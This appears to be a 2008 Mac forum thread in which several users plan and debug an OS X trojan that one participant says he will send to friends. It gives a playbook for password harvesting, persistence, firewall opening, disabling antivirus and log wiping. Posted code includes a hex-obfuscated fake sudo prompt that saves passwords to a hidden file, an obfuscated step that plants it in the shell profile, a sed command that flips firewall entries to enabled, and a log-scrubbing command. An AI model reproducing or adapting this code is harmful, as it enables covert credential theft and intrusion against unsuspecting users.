its_like_deja_vu_all_over_again
Check our secret files to see if we have already collected any passwords
defuxor
defuxorize an obfuscated string of text
dupe_user
Social-engineer a password
agent_86_reporting_for_duty_chief
Create a hidden admin user, or enable the root account, or allow a boring old existing account to log in
install_and_activate_logKext
Install and run logKext
rerun_me_every_startup
Try to insert myself into the startup or login process
enable_ssh
Turn it on
whodo_sudo
alias the sudo command to capture passwords
i_have_a_secret
Save some data someplace convenient like /Users/Shared or ~/Public or hey, maybe even /Library/WebServer/Documents :)
these_are_not_the_outgoing_network_communications_you_are_looking_for_jedi_mind trick
Sing a little lullaby to Little Snitch
i_like_you_just_as_you_are
Disable Software Update.
there_are_no_osx_viruses_silly_wabbit
Pre-emptive strike against the inevitable persecution from the anti-virus sector. Disable any a.v. software's ability to update... permanently.
pass_the_hash_man
Get every conceivable password hash on the entire system. Don't forget the Open Firmware password.
nothing_to_see_here
Stop all or some logging
throw_another_log_on_the_fire_or_none_of_this_ever_happened
Ensure that nothing unusual is left in the logs
its_smoky_in_here_lets_open_ports_in_the_firewall
Tell the OS X firewall to let us in
UPnP_how_much_did_you_drink
Tell the router to let us in too
phone_home_and_try_a_different_method_if_it_fails
Send some helpful information about how one might take over this whole computer remotely
just_hang_out_until_sudo_can_come_out_to_play
Quietly wait until sudo works
exit_stage_left
Once we've done all we need to do, we can leave or perhaps stick around and run again say, oh, once a month or so?
plan_B
If all else fails and we are not able to enable SSH... how about Telnet or WebSharing with a nice PHP shell, Apple Remote Desktop maybe etc? If we can't enable anything, at least look around and see where we have write access to modify existing programs... Maybe gain a little leverage with an exploit.
lol. Thanks nice list. But i think most of that is out of my skill level, my target now is friends most are not that bright they will NOT be checking logs. ;)
you never answered this question?
so i can discuise the apple script app and then if someone opens it it has the BASH script in it and it runs it on restart right :]
im gona go try and write it with the outline you gave me.
on your outline it says
if this program is being run by user id 0 then
just run the shell script
else
modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
move myself to /Library/Caches/
exit
end if
this is example of mine but if i send the app to someone else i wont know there name or uid?
uid=501(andrewfree) gid=20(staff) groups=20(staff),98(_lpadmin),81(_appserveradm),79(_appserverusr),101(com.apple.
harepoint.group.1),80(admin)
<-- i feel like such a loser
PS: as my comunity service for getting into my school server (with help) they tech guy showed me the Apple server and the lynux one we have it was perty cool.
you never answered this question?
so i can discuise the apple script app and then if someone opens it it has the BASH script in it and it runs it on restart right :]
im gona go try and write it with the outline you gave me.
on your outline it says
if this program is being run by user id 0 then
just run the shell script
else
modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
move myself to /Library/Caches/
exit
end if
this is example of mine but if i send the app to someone else i wont know there name or uid?
uid=501(andrewfree) gid=20(staff) groups=20(staff),98(_lpadmin),81(_appserveradm),79(_appserverusr),101(com.apple.
harepoint.group.1),80(admin)
<-- i feel like such a loser
PS: as my comunity service for getting into my school server (with help) they tech guy showed me the Apple server and the lynux one we have it was perty cool.
QUOTE(callmenames @ May 29 2008, 11:27 PM)
Lokin, you got me to try the outline view for the first time. :)
I've used it from the start except when I'm just reading a thread from top to bottom.
How do I do this its_smoky_in_here_lets_open_ports_in_the_firewall
Tell the OS X firewall to let us in, or at least point me in the right direction
Tell the OS X firewall to let us in, or at least point me in the right direction
QUOTE(andrewistheshit @ May 30 2008, 07:41 PM)
lol. Thanks nice list. But i think most of that is out of my skill level, my target now is friends most are not that bright they will NOT be checking logs. ;)
The list wasn't intended as a response to you specifically, just as an addition to this thread.
QUOTE(andrewistheshit @ May 30 2008, 07:41 PM)
you never answered this question?
so i can discuise the apple script app and then if someone opens it it has the BASH script in it and it runs it on restart right :]
I answered this in post #230 on page 23. Yes, you can disguise an AppleScript application. Yes, you can have an AppleScript run a shell script. Yes, you can have an AppleScript *try* to insert itself or a bash script into the OS X startup or login process. so i can discuise the apple script app and then if someone opens it it has the BASH script in it and it runs it on restart right :]
QUOTE(andrewistheshit @ May 30 2008, 07:41 PM)
this is example of mine but if i send the app to someone else i wont know there name or uid?
uid=501(andrewfree) gid=20(staff) groups=20(staff),98(_lpadmin),81(_appserveradm),79(_appserverusr),101(com.apple.
harepoint.group.1),80(admin)
uid=501(andrewfree) gid=20(staff) groups=20(staff),98(_lpadmin),81(_appserveradm),79(_appserverusr),101(com.apple.
harepoint.group.1),80(admin)
Your script can read the user's username and id. See lokin's AppleScript code in post #163 on page 17.
I'm trying to run a test at the beginning of the trojan to detect whether it needs to setup or rum as a startup. But Applescript is being an asshole and won't let me use if file exists:
Here is the error: "Can't make a file "/Library/Caches/.mdiod.app" into type reference. (-1700)"
I tried posix, path, etc...
Here is the error: "Can't make a file "/Library/Caches/.mdiod.app" into type reference. (-1700)"
CODE
if (exists file "/Library/Caches/.mdiod.app") then
if (exists file "/Library/Preferences/com.apple.SystemLoginItems.plist") then
if (exists file "/Library/Preferences/com.apple.SystemLoginItems.plist") then
I tried posix, path, etc...
Oktane, way, way back at the beginning of this thread we discussed how to see which files are being changed when settings (such as whether or not the firewall is on and/or which ports are open) are altered in System Preferences... is that enough of a direction? :)
QUOTE(callmenames @ May 30 2008, 10:24 PM)
Oktane, way, way back at the beginning of this thread we discussed how to see which files are being changed when settings (such as whether or not the firewall is on and/or which ports are open) are altered in System Preferences... is that enough of a direction? :)
fs_config I think, that thing is kinda confusing but I will try anyway
QUOTE(Oktane @ May 30 2008, 10:34 PM)
fs_config I think, that thing is kinda confusing but I will try anyway
I mean fs_usage and this is the file I think /Library/Preferences/com.apple.sharing.firewall.plist but its encrypted
CODE
{
allports = (407);
alludpports = (123);
firewall = {
"Adobe Version Cue CS2" = {editable = 1; enable = 0; port = (3703, 427, 50800); };
"Apple Remote Desktop" = {editable = 0; enable = 0; port = (3238); row = 5; udpport = (3238); };
"FTP Access" = {editable = 0; enable = 0; port = ("20-21", "*"); row = 4; };
"Network Time" = {editable = 1; enable = 1; row = 11; udpport = (123); };
"Personal File Sharing" = {editable = 0; enable = 0; port = (548, 427); row = 0; };
"Personal Web Sharing" = {editable = 0; enable = 0; port = (80, 427); row = 2; };
"Printer Sharing" = {editable = 0; enable = 0; port = (631, 515); row = 7; };
"Remote Apple Events" = {editable = 0; enable = 0; port = (3031); row = 6; };
"Remote Login - SSH" = {editable = 0; enable = 0; port = (22); row = 3; };
"Samba Sharing" = {editable = 0; enable = 0; port = (139); row = 1; };
Timbuktu = {editable = 1; enable = 1; port = (407); row = 10; };
"iChat Rendezvous" = {editable = 1; enable = 0; port = (5297, 5298); row = 8; };
"iPhoto Rendezvous Sharing" = {editable = 1; enable = 0; port = (8770); row = 12; };
"iTunes Music Sharing" = {editable = 1; enable = 0; port = (3689); row = 9; };
};
state = 1;
}
allports = (407);
alludpports = (123);
firewall = {
"Adobe Version Cue CS2" = {editable = 1; enable = 0; port = (3703, 427, 50800); };
"Apple Remote Desktop" = {editable = 0; enable = 0; port = (3238); row = 5; udpport = (3238); };
"FTP Access" = {editable = 0; enable = 0; port = ("20-21", "*"); row = 4; };
"Network Time" = {editable = 1; enable = 1; row = 11; udpport = (123); };
"Personal File Sharing" = {editable = 0; enable = 0; port = (548, 427); row = 0; };
"Personal Web Sharing" = {editable = 0; enable = 0; port = (80, 427); row = 2; };
"Printer Sharing" = {editable = 0; enable = 0; port = (631, 515); row = 7; };
"Remote Apple Events" = {editable = 0; enable = 0; port = (3031); row = 6; };
"Remote Login - SSH" = {editable = 0; enable = 0; port = (22); row = 3; };
"Samba Sharing" = {editable = 0; enable = 0; port = (139); row = 1; };
Timbuktu = {editable = 1; enable = 1; port = (407); row = 10; };
"iChat Rendezvous" = {editable = 1; enable = 0; port = (5297, 5298); row = 8; };
"iPhoto Rendezvous Sharing" = {editable = 1; enable = 0; port = (8770); row = 12; };
"iTunes Music Sharing" = {editable = 1; enable = 0; port = (3689); row = 9; };
};
state = 1;
}
Oktane, for your "if folder exists" issue.
CODE
try
set the_folder to (do shell script "ls -d1 \"/Library/Preferences/.mdiod.app\"")
on error
display dialog "It ain't there boss!"
end try
set the_folder to (do shell script "ls -d1 \"/Library/Preferences/.mdiod.app\"")
on error
display dialog "It ain't there boss!"
end try
Oktane, plist tricks...
From Terminal...
In 10.4 and higher, most of the plist files used by the system are in binary format, not xml (text). The program 'plutil' can convert between the two formats.
The program 'defaults' can read and write binary or xml plist files.
And of course, once it's a text file (xml) it's easy to mess with it using standard command line utilities such as 'tr' and 'sed'.
Firewall info for 10.5 http://www.google.com/search?q=%22com.apple.alf.plist%22
From Terminal...
In 10.4 and higher, most of the plist files used by the system are in binary format, not xml (text). The program 'plutil' can convert between the two formats.
CODE
sudo plutil -convert binary1 /Library/Preferences/com.apple.sharing.firewall.plist
hexdump -Cn 100 /Library/Preferences/com.apple.sharing.firewall.plist
hexdump -Cn 100 /Library/Preferences/com.apple.sharing.firewall.plist
QUOTE
00000000 62 70 6c 69 73 74 30 30 d4 01 02 03 04 05 07 08 |bplist00........|
00000010 58 5b 61 6c 6c 75 64 70 70 6f 72 74 73 55 73 74 |X[alludpportsUst|
00000020 61 74 65 58 66 69 72 65 77 61 6c 6c 58 61 6c 6c |ateXfirewallXall|
00000030 70 6f 72 74 73 a1 06 54 35 39 30 30 08 dd 09 0a |ports..T5900....|
00000040 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 21 26 2a 2e |............!&*.|
00000050 32 36 3a 3f 44 48 4e 53 5f 10 14 41 70 70 6c 65 |26:?DHNS_..Apple|
00000060 20 52 65 6d | Rem|
00000010 58 5b 61 6c 6c 75 64 70 70 6f 72 74 73 55 73 74 |X[alludpportsUst|
00000020 61 74 65 58 66 69 72 65 77 61 6c 6c 58 61 6c 6c |ateXfirewallXall|
00000030 70 6f 72 74 73 a1 06 54 35 39 30 30 08 dd 09 0a |ports..T5900....|
00000040 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 21 26 2a 2e |............!&*.|
00000050 32 36 3a 3f 44 48 4e 53 5f 10 14 41 70 70 6c 65 |26:?DHNS_..Apple|
00000060 20 52 65 6d | Rem|
CODE
sudo plutil -convert xml1 /Library/Preferences/com.apple.sharing.firewall.plist
hexdump -Cn 100 /Library/Preferences/com.apple.sharing.firewall.plist
hexdump -Cn 100 /Library/Preferences/com.apple.sharing.firewall.plist
QUOTE
00000000 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 |<?xml version="1|
00000010 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 |.0" encoding="UT|
00000020 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 |F-8"?>.<!DOCTYPE|
00000030 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 22 2d | plist PUBLIC "-|
00000040 2f 2f 41 70 70 6c 65 20 43 6f 6d 70 75 74 65 72 |//Apple Computer|
00000050 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f |//DTD PLIST 1.0/|
00000060 2f 45 4e 22 |/EN"|
00000010 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 |.0" encoding="UT|
00000020 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 |F-8"?>.<!DOCTYPE|
00000030 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 22 2d | plist PUBLIC "-|
00000040 2f 2f 41 70 70 6c 65 20 43 6f 6d 70 75 74 65 72 |//Apple Computer|
00000050 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f |//DTD PLIST 1.0/|
00000060 2f 45 4e 22 |/EN"|
The program 'defaults' can read and write binary or xml plist files.
CODE
sudo defaults read /Library/Preferences/com.apple.sharing.firewall
QUOTE
{
allports = ("5900-5902");
alludpports = (5900);
firewall = {
"Apple Remote Desktop" = {
editable = 0;
enable = 0;
port = (3283, 5900);
row = 5;
udpport = (3283, 5900);
};
"FTP Access" = {editable = 0; enable = 0; port = (21); row = 4; };
"Network Time" = {editable = 1; enable = 0; row = 11; udpport = (123); };
"Personal File Sharing" = {editable = 0; enable = 0; port = (548, 427); row = 0; };
"Personal Web Sharing" = {editable = 0; enable = 0; port = (80, 427, 443); row = 2; };
"Printer Sharing" = {editable = 0; enable = 0; port = (631, 515); row = 7; };
"Remote Apple Events" = {editable = 0; enable = 0; port = (3031); row = 6; };
"Remote Login - SSH" = {editable = 0; enable = 0; port = (22); row = 3; };
"Samba Sharing" = {editable = 0; enable = 0; port = (139); row = 1; udpport = (137, 138); };
VNC = {editable = 1; enable = 1; port = ("5900-5902"); row = 12; udpport = (5900); };
"iChat Rendezvous" = {editable = 1; enable = 0; port = (5297, 5298); row = 8; };
"iPhoto Rendezvous Sharing" = {editable = 1; enable = 0; port = (8770); row = 10; };
"iTunes Music Sharing" = {editable = 1; enable = 0; port = (3689); row = 9; };
};
state = 0;
}
allports = ("5900-5902");
alludpports = (5900);
firewall = {
"Apple Remote Desktop" = {
editable = 0;
enable = 0;
port = (3283, 5900);
row = 5;
udpport = (3283, 5900);
};
"FTP Access" = {editable = 0; enable = 0; port = (21); row = 4; };
"Network Time" = {editable = 1; enable = 0; row = 11; udpport = (123); };
"Personal File Sharing" = {editable = 0; enable = 0; port = (548, 427); row = 0; };
"Personal Web Sharing" = {editable = 0; enable = 0; port = (80, 427, 443); row = 2; };
"Printer Sharing" = {editable = 0; enable = 0; port = (631, 515); row = 7; };
"Remote Apple Events" = {editable = 0; enable = 0; port = (3031); row = 6; };
"Remote Login - SSH" = {editable = 0; enable = 0; port = (22); row = 3; };
"Samba Sharing" = {editable = 0; enable = 0; port = (139); row = 1; udpport = (137, 138); };
VNC = {editable = 1; enable = 1; port = ("5900-5902"); row = 12; udpport = (5900); };
"iChat Rendezvous" = {editable = 1; enable = 0; port = (5297, 5298); row = 8; };
"iPhoto Rendezvous Sharing" = {editable = 1; enable = 0; port = (8770); row = 10; };
"iTunes Music Sharing" = {editable = 1; enable = 0; port = (3689); row = 9; };
};
state = 0;
}
And of course, once it's a text file (xml) it's easy to mess with it using standard command line utilities such as 'tr' and 'sed'.
CODE
cat /Library/Preferences/com.apple.sharing.firewall.plist | tr -s "\n\t" "Q " | sed -e 's/enable<\/key>Q <integer>0</enable<\/key>Q <integer>1</g' | tr "Q" "\n"
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>allports</key>
<array>
<string>5900-5902</string>
</array>
<key>alludpports</key>
<array>
<string>5900</string>
</array>
<key>firewall</key>
<dict>
<key>Apple Remote Desktop</key>
<dict>
<key>editable</key>
<integer>0</integer>
<key>enable</key>
<integer>1</integer>
<key>port</key>
<array>
<string>3283</string>
<string>5900</string>
</array>
<key>row</key>
<integer>5</integer>
<key>udpport</key>
<array>
<string>3283</string>
<string>5900</string>
</array>
</dict>
<key>FTP Access</key>
<dict>
<key>editable</key>
<integer>0</integer>
<key>enable</key>
<integer>1</integer>
[...]
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>allports</key>
<array>
<string>5900-5902</string>
</array>
<key>alludpports</key>
<array>
<string>5900</string>
</array>
<key>firewall</key>
<dict>
<key>Apple Remote Desktop</key>
<dict>
<key>editable</key>
<integer>0</integer>
<key>enable</key>
<integer>1</integer>
<key>port</key>
<array>
<string>3283</string>
<string>5900</string>
</array>
<key>row</key>
<integer>5</integer>
<key>udpport</key>
<array>
<string>3283</string>
<string>5900</string>
</array>
</dict>
<key>FTP Access</key>
<dict>
<key>editable</key>
<integer>0</integer>
<key>enable</key>
<integer>1</integer>
[...]
Firewall info for 10.5 http://www.google.com/search?q=%22com.apple.alf.plist%22
Oktane, you can also download the GUI version of fseventer which may be easier to use. The command line fs_usage is still nice especially if you want to run it on another system entirely, over SSH for instance. :) fseventer is also available in command line version, and it's bundled into 10.5, it can be downloaded and installed for 10.4 and prior.
QUOTE(Oktane @ May 30 2008, 08:34 PM)
fs_config I think, that thing is kinda confusing but I will try anyway
ok thanks for outline..
but if i have that as an app and i just have a txt version of the bash shell
where do i put the bash shell in the app?
becuase if i send someone an app it needs to have the BASH script 2.
CODE
if this program is being run by user id 0 then
just run the shell script
else
modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
move myself to /Library/Caches/
exit
end if
just run the shell script
else
modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
move myself to /Library/Caches/
exit
end if
but if i have that as an app and i just have a txt version of the bash shell
where do i put the bash shell in the app?
becuase if i send someone an app it needs to have the BASH script 2.
Andrew, since the bash script is only text, it would be simple to set a variable to contain the entire contents of the bash script in the AppleScript and then have the AppleScript create the bash script file.
Or you can place the bash script anywhere inside the AppleScript application bundle, and have the AppleScript move or copy the bash script to a different location or run it from within its own bundle.
Here is an example of an AppleScript creating a bash script (echoing out the contents into a new file)
Or you can place the bash script anywhere inside the AppleScript application bundle, and have the AppleScript move or copy the bash script to a different location or run it from within its own bundle.
Here is an example of an AppleScript creating a bash script (echoing out the contents into a new file)
CODE
on alias_sudo()
do shell script "echo -e \"\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x0a\\x5b\\x20\\x22\\x78\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x3d\\x3d\\x20\\x22\\x78\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x31\\x3b\\x5b\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x6b\\x7d\\x22\\x20\\x2d\\x6f\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x4b\\x7d\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x5b\\x20\\x24\\x28\\x28\\x24\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x25\\x32\\x29\\x29\\x20\\x21\\x3d\\x20\\x30\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x65\\x63\\x68\\x6f\\x20\\x2d\\x6e\\x65\\x20\\x22\\x5c\\x78\\x35\\x30\\x5c\\x78\\x36\\x31\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x37\\x5c\\x78\\x36\\x66\\x5c\\x78\\x37\\x32\\x5c\\x78\\x36\\x34\\x5c\\x78\\x33\\x61\\x22\\x3b\\x73\\x74\\x74\\x79\\x20\\x2d\\x65\\x63\\x68\\x6f\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x72\\x65\\x61\\x64\\x20\\x70\\x61\\x73\\x73\\x3b\\x73\\x74\\x74\\x79\\x20\\x73\\x61\\x6e\\x65\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x24\\x7b\\x70\\x61\\x73\\x73\\x7d\\x20\\x22\\x20\\x3e\\x3e\\x20\\x7e\\x2f\\x50\\x75\\x62\\x6c\\x69\\x63\\x2f\\x2e\\x68\\x6f\\x77\\x64\\x79\\x3b\\x65\\x63\\x68\\x6f\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x53\\x6f\\x72\\x72\\x79\\x2c\\x20\\x74\\x72\\x79\\x20\\x61\\x67\\x61\\x69\\x6e\\x2e\\x22\\x3b\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x6b\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\" > ~/Library/.sudo2"
do shell script defuxor("puzjq2cjt+f2~/Lvomnmg/.acqj72;2nyvna2acqj=~/Lvomnmg/.acqj72;2rpuj2nyvna2acqj=~/Lvomnmg/.acqj72>>2~/.kmjsvyr")
end alias_sudo
do shell script "echo -e \"\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x0a\\x5b\\x20\\x22\\x78\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x3d\\x3d\\x20\\x22\\x78\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x31\\x3b\\x5b\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x6b\\x7d\\x22\\x20\\x2d\\x6f\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x4b\\x7d\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x5b\\x20\\x24\\x28\\x28\\x24\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x25\\x32\\x29\\x29\\x20\\x21\\x3d\\x20\\x30\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x65\\x63\\x68\\x6f\\x20\\x2d\\x6e\\x65\\x20\\x22\\x5c\\x78\\x35\\x30\\x5c\\x78\\x36\\x31\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x37\\x5c\\x78\\x36\\x66\\x5c\\x78\\x37\\x32\\x5c\\x78\\x36\\x34\\x5c\\x78\\x33\\x61\\x22\\x3b\\x73\\x74\\x74\\x79\\x20\\x2d\\x65\\x63\\x68\\x6f\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x72\\x65\\x61\\x64\\x20\\x70\\x61\\x73\\x73\\x3b\\x73\\x74\\x74\\x79\\x20\\x73\\x61\\x6e\\x65\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x24\\x7b\\x70\\x61\\x73\\x73\\x7d\\x20\\x22\\x20\\x3e\\x3e\\x20\\x7e\\x2f\\x50\\x75\\x62\\x6c\\x69\\x63\\x2f\\x2e\\x68\\x6f\\x77\\x64\\x79\\x3b\\x65\\x63\\x68\\x6f\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x53\\x6f\\x72\\x72\\x79\\x2c\\x20\\x74\\x72\\x79\\x20\\x61\\x67\\x61\\x69\\x6e\\x2e\\x22\\x3b\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x2d\\x6b\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\" > ~/Library/.sudo2"
do shell script defuxor("puzjq2cjt+f2~/Lvomnmg/.acqj72;2nyvna2acqj=~/Lvomnmg/.acqj72;2rpuj2nyvna2acqj=~/Lvomnmg/.acqj72>>2~/.kmjsvyr")
end alias_sudo
RE: Post #42 on page 5.
Well that explains why everyone was having so much trouble getting that working. I seem to have left off the () from the last line. I blame copy and paste once again, for not correcting such things for me. Apologies to Oktane in particular over this one. Oops.
Well that explains why everyone was having so much trouble getting that working. I seem to have left off the () from the last line. I blame copy and paste once again, for not correcting such things for me. Apologies to Oktane in particular over this one. Oops.
CODE
enable_ssh()
RE:Post #176 on page 18
Sometimes I'm about as helpful as a bowling ball in a horseshoe throwing contest.
To access files within the AppleScript application bundle...
Sometimes I'm about as helpful as a bowling ball in a horseshoe throwing contest.
To access files within the AppleScript application bundle...
CODE
set the_path to ((path to me) as text) & "bash_script.sh"
set the_other_path to POSIX path of (((path to me) as text) & "bash_script.sh")
set the_other_path to POSIX path of (((path to me) as text) & "bash_script.sh")
RE:Post #13 on page 2
More corrections. Sigh.
More corrections. Sigh.
QUOTE(callmenames @ May 20 2008, 10:44 PM)
How should you save which/what file? An AppleScript? Run only/application bundle with no window and no stay open. A shell script? A text file with execute permissions set on the file.
And by "no window" I meant "no startup screen"QUOTE(callmenames @ May 20 2008, 10:44 PM)
To make an AppleScript run "invisible" (which won't actually be necessary in this case because you are going to have it run prior to the user logging in which means they will never see it anyway
I was wrong, if the app isn't fast enough to run and exit prior to user login they will definitely see things such as the app name in the menu bar, icon in the dock etc. if the app has GUI elements. The best way to avoid that with an AppleScript application bundle is to add the LSUIElement boolean yes to the info.plist inside the bundle.
RE:Post #192 on page 20
That's /etc/sshd_config
Make that... sed -e '/^.*[Ff][Rr][Oo][Mm].*$/d' secure.log > secure.log.2 && mv secure.log.2 secure.log
QUOTE(callmenames @ May 29 2008, 09:23 AM)
[...]Ideas, thoughts, suggestions...
cat /etc/syslog.conf
cat sshd_config | grep log
cat /etc/syslog.conf
cat sshd_config | grep log
That's /etc/sshd_config
QUOTE(callmenames @ May 29 2008, 09:23 AM)
sed -e '/^.*[Ff][Rr][Oo][Mm].*$/d' secure.log > secure.log.2 && mv secure.log2 secure.log
Make that... sed -e '/^.*[Ff][Rr][Oo][Mm].*$/d' secure.log > secure.log.2 && mv secure.log.2 secure.log
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.